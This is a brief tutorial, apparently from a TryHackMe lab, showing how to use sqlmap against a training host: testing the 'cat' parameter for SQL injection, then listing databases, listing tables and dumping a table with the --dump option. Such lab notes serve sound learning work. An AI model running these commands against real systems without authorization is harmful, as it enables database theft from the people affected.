SQLMap The Basics

sqlmap -u http://sqlmaptesting.thm/search/cat=1

this command helps us to test different types of injection for the parameter cat

then we can elaborate more and get more data

then we can use

sqlmap -u http://sqlmaptesting.thm/search/cat=1 --dbs

to get the names of the databases then

sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D users --tables

to get tables in database then

sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D users -T thomas --dump